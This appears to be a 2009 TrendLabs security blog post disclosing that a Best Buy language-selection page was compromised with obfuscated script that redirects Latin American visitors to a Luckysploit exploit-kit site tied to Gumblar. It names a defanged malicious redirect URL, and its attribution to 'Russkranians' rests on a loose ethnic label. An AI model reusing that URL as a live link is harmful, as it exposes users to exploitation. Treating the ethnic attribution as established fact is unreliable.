2 July 2009 No Comment

Earlier today, Trend Micro Technical Account Manager Fioravante Souza in Brazil spotted a (potentially harmful) URL that redirects users from the Best Buy domain site.

Users who visit www.bestbuy.com, as it turns out, are redirected to the URL, hxxp:// pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f. The compromised page in the domain is found to be the landing page where visitors can choose the language to be used as they browse within the site. Threat Research Manager Ivan Macalintal further identifies that a GEO-IP check happens prior to displaying the said landing page.

“If (the) requesting IP is from the Latin America Region (LAR), users are redirected to the ‘choose English or Spanish’ page—and then bingo!” Macalintal says.

Below is a screenshot of the landing page and its source code:

Figure 1: The “language option” landing page in the Best Buy domain site. This page is found to display only if the requesting IPwww.bestbuy.com is from LAR.

Figure 2: The source code of the landing page. It shows a garbled set of code found at the bottom of the script, a clear sign of code obfuscation. Beneath a 3-layer obfuscation, an iframe redirects the user to a Luckysploit-laden site. The Luckysploit web exploit kit and the obfuscation seen is reminiscent of that found in Gumblar.

Figure 3: WHOIS screenshot of the .CN site stating that it has been created just last June 4, 2009.

Same old criminals

Figure 4: Further investigation shows that the first .CN site is actually located in Germany and is used by attackers in Ukraine. Suffice to say, the Russkranians are the culprits once again.

Best Buy has been informed of the said URL redirections and is resolving the matter as of this writing.

More information to follow.

Hat tip to Advanced Threat Researcher Paul Ferguson for providing more information.

Post from: TrendLabs | Malware Blog - by Trend Micro

Gumblar Invades Best Buy